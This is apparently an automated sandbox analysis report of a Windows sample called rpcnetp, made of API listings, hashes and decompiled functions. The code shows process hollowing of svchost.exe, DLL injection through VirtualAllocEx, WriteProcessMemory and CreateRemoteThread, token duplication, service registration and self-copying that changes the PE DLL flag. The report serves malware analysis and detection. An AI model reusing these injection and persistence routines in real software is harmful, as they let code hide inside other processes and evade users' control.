0x00a12b1e
0x00a12cf5
0x00a12cf5
0x00a12cf9
0x00a12d06
0x00a12b24
0x00a12b26
0x00a12b30
0x00a12b35
0x00a12b3d
0x00a12b41
0x00a12b4b
0x00a12b51
0x00a12b70
0x00a12b70
0x00a12b78
0x00a12c10
0x00a12c16
0x00a12b7a
0x00a12b7a
0x00a12b7d
0x00a12b80
0x00a12b9a
0x00a12ba7
0x00a12bad
0x00a12bad
0x00a12bb0
0x00a12bb1
0x00a12bb6
0x00a12bb7
0x00a12be3
0x00a12be9
0x00a12bee
0x00a12bee
0x00a12be9
0x00a12c1c
0x00a12c43
0x00a12c43
0x00a12c48
0x00000000
0x00000000
0x00a12c51
0x00a12c53
0x00a12c53
0x00a12c70
0x00a12c79
0x00a12cc2
0x00000000
0x00a12c7b
0x00a12c8d
0x00a12c95
0x00a12cc8
0x00a12cce
0x00a12ced
0x00a12cf2
0x00a12cd0
0x00a12cdf
0x00a12ce5
0x00a12ce5
0x00000000
0x00a12cce
0x00000000
0x00a12c95
0x00a12c1e
0x00a12c21
0x00a12c97
0x00a12c9a
0x00a12ca0
0x00a12ca9
0x00a12ca9
0x00a12cb2
0x00a12cb7
0x00a12cb7
0x00000000
0x00a12cb2
0x00a12c2b
0x00a12c3b
0x00a12c40
0x00000000
0x00a12c40
0x00a12c1c

APIs
  • GetCurrentProcessId.KERNEL32(00A15410,00000180,00A132A3,00000000,00000001), ref: 00A12B03
  • OpenProcess.KERNEL32(001FFFFF,00000001,00000000), ref: 00A12B13
  • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000000,00000001,?), ref: 00A12B92
  • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004), ref: 00A12BA7
  • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 00A12BB7
  • CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000001,00000404,?,00000000,?,?,?,?,00000000), ref: 00A12BDD
  • CloseHandle.KERNEL32(?), ref: 00A12BEE
  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 00A12C10
  • WriteProcessMemory.KERNELBASE(?,?,00A160C8,00000080,00000000), ref: 00A12C70
  • TerminateProcess.KERNEL32(?,00000000), ref: 00A12CA0
    • Part of subcall function 00A12598: GetSystemDirectoryA.KERNEL32(?,?), ref: 00A125AF
    • Part of subcall function 00A12598: lstrcatA.KERNEL32(?,\svchost.exe), ref: 00A125BD
  • CloseHandle.KERNEL32(?), ref: 00A12CA9
  • CloseHandle.KERNEL32(?), ref: 00A12CB7
  • ResumeThread.KERNEL32(?), ref: 00A12CC2
  • CreateThread.KERNELBASE(00000000,00000000,Function_00002758,?,00000000,?), ref: 00A12CDF
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: Process$Create$CloseHandle$ThreadToken$BlockCurrentDirectoryDuplicateEnvironmentInformationMemoryOpenResumeSystemTerminateUserWritelstrcat
  • String ID:
  • API String ID: 1678882957-0
  • Opcode ID: 4aaf35f9ac2806ffdc51e1ca94e6dbfa22e654cb07cc6ce8ca645301e3bc28b7
  • Instruction ID: 94f7dac6129bd2c152f180ea16bf99a378b7f0cd7a5dcf7816b8349202cab922
  • Opcode Fuzzy Hash: 4aaf35f9ac2806ffdc51e1ca94e6dbfa22e654cb07cc6ce8ca645301e3bc28b7
  • Instruction Fuzzy Hash: AE61B371D02228AFDB21DF91DD49EEEBB79FF08751F108066F605A6160D7309A95CBA0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 98%
			E00A132DE() {
				void* _v8;
				void* _v12;
				long _v16;
				long _t11;
				void* _t13;
				signed int _t14;
				void* _t18;
				void* _t20;
				intOrPtr _t26;
				signed int _t30;
				int _t33;
				void* _t34;
				void* _t35;
				void* _t37;

				_t11 = GetVersion();
				_t33 = 0;
				 *0xa160b0 = _t11;
				if( *0xa1608c == 0 && _t11 < 0) {
					 *0xa16038 =  *0xa16038 | 0xffffffff;
				}
				_v8 = GetStdHandle(0xfffffff4);
				_t13 = E00A13420(_t12); // executed
				_t37 = _t13;
				if(_t37 == _t33) {
					L11:
					_t14 =  *0xa16038;
					__eflags = _t14 - _t33;
					if(_t14 != _t33) {
						__eflags = _t14 - 2;
						if(_t14 == 2) {
							goto L23;
						}
						__eflags = _t37 - _t33;
						if(_t37 != _t33) {
							L17:
							 *0xa160ac = CreateEventA(_t33, _t33, _t33, _t33);
							L18:
							_t18 = CreateThread(_t33, _t33, E00A13161, _t33, _t33,  &_v16);
							_v12 = _t18;
							__eflags = _t18 - _t33;
							if(_t18 != _t33) {
								_t20 =  *0xa160ac;
								__eflags = _t20 - _t33;
								if(_t20 != _t33) {
									WaitForSingleObject(_t20, 0xffffffff);
									CloseHandle( *0xa160ac);
									 *0xa160ac = _t33;
								}
								WaitForSingleObject(_v12, 0xffffffff);
								CloseHandle(_v12);
							}
							E00A12FBB(_t35, _t33);
							goto L23;
						}
						__eflags = _t14 - 0xffffffff;
						if(_t14 != 0xffffffff) {
							goto L18;
						}
						goto L17;
					}
					__eflags = _t37 - _t33;
					if(_t37 != _t33) {
						goto L17;
					}
					E00A11EDA();
					goto L23;
				} else {
					_t26 =  *0xa16008;
					 *0xa16004 = _t33;
					_t45 =  *((intOrPtr*)(_t26 + 0x28)) - _t33;
					if( *((intOrPtr*)(_t26 + 0x28)) != _t33) {
						 *0xa16038 = 1;
						SetStdHandle(0xfffffff6, _v8);
						goto L11;
					}
					 *0xa16038 = 2;
					_t34 = E00A12123(_t33, CloseHandle, _t37, _t45);
					 *( *0xa16008 + 0x28) = 1;
					_t30 = E00A12ADB(_t34, _t35, CloseHandle, _t37, _t45, _t34);
					asm("sbb esi, esi");
					_t37 =  ~_t30 + 1;
					if(_t34 != 0) {
						CloseHandle(_t34);
					}
					if(_t37 != 0) {
						_t33 = 0;
						__eflags = 0;
						goto L11;
					} else {
						E00A12FBB(_t35, _t37);
						_t33 = 0;
						L23:
						if(_v8 != _t33) {
							CloseHandle(_v8);
						}
						ExitProcess(_t33);
					}
				}
			}

















0x00a132e7
0x00a132ed
0x00a132ef
0x00a132fa
0x00a13300
0x00a13300
0x00a13310
0x00a13313
0x00a1331e
0x00a13322
0x00a1338f
0x00a1338f
0x00a13394
0x00a13396
0x00a133a3
0x00a133a6
0x00000000
0x00000000
0x00a133a8
0x00a133aa
0x00a133b1
0x00a133bb
0x00a133c0
0x00a133cd
0x00a133d3
0x00a133d6
0x00a133d8
0x00a133da
0x00a133e5
0x00a133e7
0x00a133ec
0x00a133f4
0x00a133f6
0x00a133f6
0x00a13401
0x00a13406
0x00a13406
0x00a13409
0x00000000
0x00a13409
0x00a133ac
0x00a133af
0x00000000
0x00000000
0x00000000
0x00a133af
0x00a13398
0x00a1339a
0x00000000
0x00000000
0x00a1339c
0x00000000
0x00a13324
0x00a13324
0x00a13329
0x00a1332f
0x00a13332
0x00a13379
0x00a13385
0x00000000
0x00a13385
0x00a13334
0x00a13343
0x00a1334b
0x00a13352
0x00a1335b
0x00a1335d
0x00a13360
0x00a13363
0x00a13363
0x00a13367
0x00a1338d
0x00a1338d
0x00000000
0x00a13369
0x00a1336a
0x00a1336f
0x00a1340e
0x00a13411
0x00a13416
0x00a13416
0x00a13419
0x00a13419
0x00a13367

APIs
  • GetVersion.KERNEL32 ref: 00A132E7
  • GetStdHandle.KERNEL32(000000F4), ref: 00A13309
  • CloseHandle.KERNEL32(00000000), ref: 00A13363
  • SetStdHandle.KERNEL32(000000F6,?,00000000), ref: 00A13385
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00A133B5
  • CreateThread.KERNEL32(00000000,00000000,Function_00003161,00000000,00000000,?), ref: 00A133CD
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A133EC
  • CloseHandle.KERNEL32 ref: 00A133F4
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A13401
  • CloseHandle.KERNEL32(?), ref: 00A13406
  • CloseHandle.KERNEL32(?,00000000), ref: 00A13416
  • ExitProcess.KERNEL32 ref: 00A13419
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: Handle$Close$CreateObjectSingleWait$EventExitProcessThreadVersion
  • String ID:
  • API String ID: 2472693224-0
  • Opcode ID: 9eb75597c1dcf935af69cbe47b1ab0253da16cd132fdb7e25c43925eb284c1eb
  • Instruction ID: b05ab603d33a8bbd7e11d4ef8abb7e9af2e7640b874ad867f733c5c9b8b2a928
  • Opcode Fuzzy Hash: 9eb75597c1dcf935af69cbe47b1ab0253da16cd132fdb7e25c43925eb284c1eb
  • Instruction Fuzzy Hash: FE31C676800214EFCF21EFE59DC49EA7A78AB083A0711C225E625D71A1DB308FC6CB64
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 163 a127d2-a127f6 VirtualAllocEx 164 a12838-a1283f 163->164 165 a127f8-a12812 lstrlenA WriteProcessMemory 163->165 166 a12814-a12825 call a124bc 165->166 167 a1282a-a12832 VirtualFreeEx 165->167 166->167 167->164
C-Code - Quality: 89%
			E00A127D2(void* __ecx, void* _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				void* _t9;
				int _t13;
				void* _t18;
				void* _t22;

				_t20 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t18 = _a8;
				_t9 = VirtualAllocEx(_t18, 0, 0x1000, 0x1000, 4); // executed
				_t22 = _t9;
				if(_t22 != 0) {
					_t13 = WriteProcessMemory(_t18, _t22, _a4, lstrlenA(_a4) + 1, 0); // executed
					if(_t13 != 0) {
						E00A124BC(_t20, _t18, __imp__LoadLibraryA, _t22, _a12,  &_v8, 1); // executed
					}
					VirtualFreeEx(_t18, _t22, 0x1000, 0x8000);
				}
				return _v8;
			}








0x00a127d2
0x00a127d5
0x00a127d6
0x00a127db
0x00a127ec
0x00a127f2
0x00a127f6
0x00a1280a
0x00a12812
0x00a12825
0x00a12825
0x00a12832
0x00a12832
0x00a1283f

APIs
  • VirtualAllocEx.KERNELBASE(?,00000000,00001000,00001000,00000004), ref: 00A127EC
  • lstrlenA.KERNEL32(?,00000000), ref: 00A127FD
  • WriteProcessMemory.KERNELBASE(?,00000000,?,00000001), ref: 00A1280A
  • VirtualFreeEx.KERNEL32(?,00000000,00001000,00008000), ref: 00A12832
    • Part of subcall function 00A124BC: CreateRemoteThread.KERNELBASE(?,00000000,00000000,?,?,00000000,00000000), ref: 00A124E1
    • Part of subcall function 00A124BC: CloseHandle.KERNEL32(?), ref: 00A12523
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: Virtual$AllocCloseCreateFreeHandleMemoryProcessRemoteThreadWritelstrlen
  • String ID:
  • API String ID: 4087653319-0
  • Opcode ID: f0ec0ba5758399cee83eb324f4a13f19e329afbb67503b0fa16348af5e65141c
  • Instruction ID: 5e3993ed9b9bb32cad0a7df1793a3bd231dca192a5486413ed30d15283850265
  • Opcode Fuzzy Hash: f0ec0ba5758399cee83eb324f4a13f19e329afbb67503b0fa16348af5e65141c
  • Instruction Fuzzy Hash: 5001D176500244BBD721CBA2DC49FDB3F3CEB89791F108024FB0991090D674D940C774
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 178 a11eda-a11eea StartServiceCtrlDispatcherA
C-Code - Quality: 100%
			E00A11EDA() {

				StartServiceCtrlDispatcherA(0xa16090); // executed
				return  *0xa1601c;
			}



0x00a11edf
0x00a11eea

APIs
  • StartServiceCtrlDispatcherA.ADVAPI32(00A16090,00A133A1,00000000), ref: 00A11EDF
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: CtrlDispatcherServiceStart
  • String ID:
  • API String ID: 3789849863-0
  • Opcode ID: 53791ac34ea6f65f05e67ac19f99a29b9498df4924b5724ce74db7c14f19d3d8
  • Instruction ID: fb21f4cb0396d115f65d5d7ce3a6b91aec2d8f08c3f6e9689cbb8e7a4cdcac9c
  • Opcode Fuzzy Hash: 53791ac34ea6f65f05e67ac19f99a29b9498df4924b5724ce74db7c14f19d3d8
  • Instruction Fuzzy Hash: 27A00278B40240DB8E70DBE4ED49AC87763B74C741300C844E556C2364C669E8C3EA31
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 100%
			E00A12842(long _a4, void _a8) {
				CHAR* _v8;
				char _v268;
				long _t21;
				int _t24;
				int _t25;
				struct HINSTANCE__* _t28;
				signed short _t30;
				CHAR* _t37;
				void* _t40;
				long _t44;
				CHAR* _t46;
				void* _t48;

				_t21 = GetModuleFileNameA( *0xa160c4,  &_v268, 0x104);
				if(_t21 == 0) {
					return _t21;
				}
				_v8 = "dll";
				if(_a8 != 0) {
					_v8 = "exe";
				}
				_t46 = _a4;
				lstrcpyA(_t46,  &_v268);
				_t24 = lstrlenA(_t46);
				_t9 = _t46 - 3; // -3
				_t37 = _t24 + _t9;
				_t25 = lstrcmpiA(_t37, _v8); // executed
				if(_t25 != 0) {
					lstrcpyA(_t37, _v8);
					_t25 = CopyFileA( &_v268, _t46, 0); // executed
					if(_t25 != 0) {
						_t25 = CreateFileA(_t46, 0xc0000000, 3, 0, 3, 0, 0); // executed
						_t48 = _t25;
						if(_t48 != 0xffffffff) {
							_t28 =  *0xa160c4;
							_t40 =  *((intOrPtr*)(_t28 + 0x3c)) + _t28;
							_t44 = _t40 - _t28 + 0x16;
							_a4 = _t44;
							if(_a8 != 0) {
								_t30 =  *(_t40 + 0x16) & 0x0000dfff;
							} else {
								_t30 = 0x00002000 |  *(_t40 + 0x16);
							}
							_a8 = _t30;
							SetFilePointer(_t48, _t44, 0, 0); // executed
							WriteFile(_t48,  &_a8, 2,  &_a4, 0); // executed
							_t25 = CloseHandle(_t48);
						}
					}
				}
				return _t25;
			}















0x00a1285d
0x00a12865
0x00a12942
0x00a12942
0x00a1286f
0x00a12876
0x00a12878
0x00a12878
0x00a12888
0x00a12893
0x00a12896
0x00a1289f
0x00a1289f
0x00a128a4
0x00a128ac
0x00a128b6
0x00a128c3
0x00a128cb
0x00a128da
0x00a128e0
0x00a128e5
0x00a128e7
0x00a128ef
0x00a128f5
0x00a128f8
0x00a128fe
0x00a12914
0x00a12900
0x00a12905
0x00a12905
0x00a1291b
0x00a1291f
0x00a12931
0x00a12938
0x00a12938
0x00a128e5
0x00a128cb
0x00000000

APIs
  • GetModuleFileNameA.KERNEL32(?,00000104), ref: 00A1285D
  • lstrcpyA.KERNEL32(?,?), ref: 00A12893
  • lstrlenA.KERNEL32(?), ref: 00A12896
  • lstrcmpiA.KERNEL32(-00000003,00A112DC), ref: 00A128A4
  • lstrcpyA.KERNEL32(-00000003,00A112DC), ref: 00A128B6
  • CopyFileA.KERNEL32 ref: 00A128C3
  • CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 00A128DA
  • SetFilePointer.KERNELBASE(00000000,?,00000000,00000000), ref: 00A1291F
  • WriteFile.KERNELBASE(00000000,00000000,00000002,?,00000000), ref: 00A12931
  • CloseHandle.KERNEL32(00000000), ref: 00A12938
Strings
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: File$lstrcpy$CloseCopyCreateHandleModuleNamePointerWritelstrcmpilstrlen
  • String ID: dll$exe
  • API String ID: 3010676052-2048111982
  • Opcode ID: 4eb5f2a434dee52a668a620bff137f86e626694c8c1184003288bfff89bcd8d1
  • Instruction ID: dd06b54f04aa5780a25634731efdf7339108dd4e0b0839c199a087b8049a2ed5
  • Opcode Fuzzy Hash: 4eb5f2a434dee52a668a620bff137f86e626694c8c1184003288bfff89bcd8d1
  • Instruction Fuzzy Hash: D9314B75901118BBDB20DFA6DC48FEA3B7CEF497A0F108069FA45D7190D6748A86CBA0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 95 a1351d-a13531 96 a135f4-a135fd KillTimer 95->96 97 a13537-a1353a 95->97 100 a13602-a13613 PeekMessageA 96->100 98 a135a1-a135ae 97->98 99 a1353c-a13541 97->99 104 a135b4-a135be call a12ea1 98->104 101 a13543-a13548 99->101 102 a1354f-a13553 99->102 100->100 103 a13615-a13620 PostQuitMessage 100->103 101->104 105 a1354a 101->105 106 a13622-a1362c DefWindowProcA 102->106 107 a13559-a13562 KillTimer 102->107 103->106 108 a135c0-a135c2 103->108 104->108 113 a135c4-a135cb 104->113 105->106 110 a13632-a13636 106->110 111 a13567-a13578 PeekMessageA 107->111 108->110 111->111 114 a1357a-a13587 call a1327b 111->114 115 a135db-a135e1 113->115 116 a135cd-a135d5 SetEvent 113->116 114->106 120 a1358d-a1359c SetTimer 114->120 115->96 118 a135e3-a135f2 SetTimer 115->118 116->115 118->108 120->106
C-Code - Quality: 100%
			E00A1351D(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagMSG _v32;
				void* __edi;
				void* __esi;
				int _t13;
				long _t17;
				void* _t18;
				void* _t20;
				void* _t23;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HWND__* _t36;

				_t36 = _a4;
				_t13 = _a8;
				_t31 = 0;
				if(_t13 == 0) {
					L17:
					KillTimer(_t36, 0x64);
					do {
					} while (PeekMessageA( &_v32, _t36, 0x113, 0x113, 1) != 0);
					PostQuitMessage(_t31);
					if(_a8 != 0x11) {
						L12:
						_t17 = 0;
						L21:
						return _t17;
					}
					L20:
					_t17 = DefWindowProcA(_t36, _a8, _a12, _a16); // executed
					goto L21;
				}
				_t18 = _t13 - 0xf;
				if(_t18 == 0) {
					 *0xa16088 = 1;
					 *0xa1602c = _t31;
					 *0xa160b8 = _t31;
					L11:
					if(E00A12EA1(_t34, _a16) == 0) {
						_t20 =  *0xa160ac;
						if(_t20 != _t31) {
							 *0xa16088 = 1;
							SetEvent(_t20);
						}
						if( *0xa16088 != _t31) {
							goto L17;
						} else {
							SetTimer(_t36, 0x64, 0xdbba0, _t31);
							goto L12;
						}
					}
					goto L12;
				}
				_t23 = _t18 - 0x102;
				if(_t23 == 0) {
					if(_a12 != 0x64) {
						goto L20;
					}
					KillTimer(_t36, 0x64);
					do {
					} while (PeekMessageA( &_v32, _t36, 0x113, 0x113, 1) != 0);
					E00A1327B(_t34, _t36, 0x113); // executed
					if( *0xa16038 == 0) {
						SetTimer(_t36, 0x64, 0xdbba0, 0); // executed
					}
					goto L20;
				}
				if(_t23 == 0x2ed) {
					goto L11;
				}
				goto L20;
			}














0x00a13529
0x00a1352d
0x00a13530
0x00a13531
0x00a135f4
0x00a135f7
0x00a13602
0x00a13611
0x00a13616
0x00a13620
0x00a135c0
0x00a135c0
0x00a13632
0x00a13636
0x00a13636
0x00a13622
0x00a1362c
0x00000000
0x00a1362c
0x00a13537
0x00a1353a
0x00a135a1
0x00a135a8
0x00a135ae
0x00a135b4
0x00a135be
0x00a135c4
0x00a135cb
0x00a135ce
0x00a135d5
0x00a135d5
0x00a135e1
0x00000000
0x00a135e3
0x00a135ec
0x00000000
0x00a135ec
0x00a135e1
0x00000000
0x00a135be
0x00a1353c
0x00a13541
0x00a13553
0x00000000
0x00000000
0x00a1355c
0x00a13567
0x00a13576
0x00a1357a
0x00a13587
0x00a13596
0x00a13596
0x00000000
0x00a13587
0x00a13548
0x00000000
0x00000000
0x00000000

APIs
  • KillTimer.USER32(?,00000064), ref: 00A1355C
  • PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 00A13570
  • SetTimer.USER32(?,00000064,000DBBA0,00000000), ref: 00A13596
  • SetEvent.KERNEL32(?), ref: 00A135D5
  • SetTimer.USER32(?,00000064,000DBBA0,00000000), ref: 00A135EC
  • KillTimer.USER32(?,00000064), ref: 00A135F7
  • PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 00A1360B
  • PostQuitMessage.USER32(00000000), ref: 00A13616
  • DefWindowProcA.USER32(?,00000011,?,?), ref: 00A1362C
Strings
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: Timer$Message$KillPeek$EventPostProcQuitWindow
  • String ID: d
  • API String ID: 2149785620-2564639436
  • Opcode ID: ab161969736995bb59142e4bd404a1794e6fbd0e1261600aa34e5faa6f1c9fc5
  • Instruction ID: f111b4850d15c0897b954ae918eabbcee6f5e15aab22f9e57378d39ed036c871
  • Opcode Fuzzy Hash: ab161969736995bb59142e4bd404a1794e6fbd0e1261600aa34e5faa6f1c9fc5
  • Instruction Fuzzy Hash: 7031BF72540204BEDF20DFA4AD89FEB7F6EAB15B64F04C018F705E51A1C7758B82DA21
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 75%
			E00A12658(void* __ecx) {
				void* _v8;
				long _v12;
				int _t6;
				void* _t11;
				struct HWND__* _t13;
				intOrPtr _t24;

				 *0xa160a4 = CreateEventA(0, 1, 0, 0);
				 *0xa16010 = 0x10;
				 *0xa1601c = 0x42a;
				 *0xa16020 = 1;
				_t6 = RegisterServiceCtrlHandlerA("rpcnet", E00A11EEB);
				 *0xa160bc = _t6;
				if(_t6 != 0) {
					_push(0);
					_push(0x1388);
					_t24 = 2;
					_push(_t24);
					 *0xa16018 = 1; // executed
					E00A12266(); // executed
					 *0xa16018 = 5;
					E00A12266(4, 0, 0); // executed
					E00A12296(); // executed
					 *0xa1601c = 0;
					 *0xa16020 = 0; // executed
					_t11 = CreateThread(0, 0, E00A13161, 0, 0,  &_v12); // executed
					_v8 = _t11;
					if(_t11 != 0) {
						WaitForSingleObject( *0xa160a4, 0xffffffff);
						_t13 =  *0xa1600c;
						if(_t13 != 0) {
							PostMessageA(_t13, 0x11, 0, 0);
						}
						WaitForSingleObject(_v8, 0x7530);
						CloseHandle(_v8);
					} else {
						 *0xa16020 = _t24;
					}
					CloseHandle( *0xa160a4);
					_t6 = E00A12266(1, 0, 0);
				}
				return _t6;
			}









0x00a12678
0x00a1267d
0x00a12687
0x00a12691
0x00a12697
0x00a1269d
0x00a126a4
0x00a126ab
0x00a126ac
0x00a126b3
0x00a126b4
0x00a126b5
0x00a126bb
0x00a126c4
0x00a126ce
0x00a126d3
0x00a126e5
0x00a126eb
0x00a126f1
0x00a126f7
0x00a126fc
0x00a12714
0x00a12716
0x00a1271d
0x00a12724
0x00a12724
0x00a12732
0x00a12737
0x00a126fe
0x00a126fe
0x00a126fe
0x00a12743
0x00a1274c
0x00a12751
0x00a12755

APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00A12668
  • RegisterServiceCtrlHandlerA.ADVAPI32(rpcnet,00A11EEB), ref: 00A12697
    • Part of subcall function 00A12266: SetServiceStatus.ADVAPI32(00A16010,?,00A126C0,00000002,00001388,00000000), ref: 00A1228C
    • Part of subcall function 00A12296: RegOpenKeyA.ADVAPI32(80000002,System\CurrentControlSet\Services\rpcnetp,?), ref: 00A122B1
    • Part of subcall function 00A12296: RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00A160C8,00000080,00000002,00000000,00000001), ref: 00A122CF
    • Part of subcall function 00A12296: RegEnumValueA.ADVAPI32 ref: 00A12300
    • Part of subcall function 00A12296: RegCloseKey.ADVAPI32(?), ref: 00A12309
  • CreateThread.KERNELBASE(00000000,00000000,00A13161,00000000,00000000,?), ref: 00A126F1
  • WaitForSingleObject.KERNEL32(000000FF), ref: 00A12714
  • PostMessageA.USER32 ref: 00A12724
  • WaitForSingleObject.KERNEL32(?,00007530), ref: 00A12732
  • CloseHandle.KERNEL32(?), ref: 00A12737
  • CloseHandle.KERNEL32 ref: 00A12743
Strings
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: Close$CreateHandleObjectServiceSingleValueWait$CtrlEnumEventHandlerMessageOpenPostQueryRegisterStatusThread
  • String ID: rpcnet
  • API String ID: 2965456292-717388198
  • Opcode ID: 03f62e30dcc2cda566649fea241f45f84f8f22b689ced2ebd73a5e6cdc2bc40f
  • Instruction ID: 92a43053453e3f98477f2486ba6a0ce95f252086c30b0c77c5fd196aea37f793
  • Opcode Fuzzy Hash: 03f62e30dcc2cda566649fea241f45f84f8f22b689ced2ebd73a5e6cdc2bc40f
  • Instruction Fuzzy Hash: E6214175902264BFC720EFE6AC49EDB7E6CFF09791B10C519F205D51A0C7B48682DBA0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 81%
			E00A13161(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t11;
				struct HWND__* _t14;
				CHAR* _t30;
				void* _t35;

				_push(0x128);
				_push(0xa15430);
				E00A14A94(__ebx, __edi, __esi);
				 *(_t35 - 4) = 0;
				_t11 =  *0xa160c4;
				 *0x00A16070 = _t11;
				_t30 = _t35 - 0x138;
				 *0x00A16084 = _t30;
				GetModuleFileNameA(_t11, _t30, 0x103); // executed
				RegisterClassA(0xa16060); // executed
				_t14 = CreateWindowExA(0, _t30, 0, 0x80000, 0, 0, 0, 0, 0, 0, _t11, 0); // executed
				 *0xa1600c = _t14;
				asm("sbb eax, eax");
				SetTimer( *0xa1600c, 0x64, ( ~( *0xa16038) & 0xffff1d70) + 0xea60, 0); // executed
				while(GetMessageA(_t35 - 0x34, 0, 0, 0) != 0) {
					TranslateMessage(_t35 - 0x34);
					DispatchMessageA(_t35 - 0x34); // executed
				}
				 *0xa1600c = 0;
				 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
				return E00A1159C(0);
			}







0x00a13161
0x00a13166
0x00a1316b
0x00a13172
0x00a1317d
0x00a13182
0x00a13192
0x00a13198
0x00a131a5
0x00a131ab
0x00a131b1
0x00a131b7
0x00a131c4
0x00a131d9
0x00a131df
0x00a131f4
0x00a131fe
0x00a131fe
0x00a13206
0x00a13215
0x00a13220

APIs
  • GetModuleFileNameA.KERNEL32(?,?,00000103,00A16060,00000000,?,00000000,00080000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00A131A5
  • RegisterClassA.USER32 ref: 00A131AB
  • CreateWindowExA.USER32 ref: 00A131B1
  • SetTimer.USER32(00000064,?,00000000), ref: 00A131D9
  • GetMessageA.USER32 ref: 00A131E6
  • TranslateMessage.USER32(?), ref: 00A131F4
  • DispatchMessageA.USER32 ref: 00A131FE
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
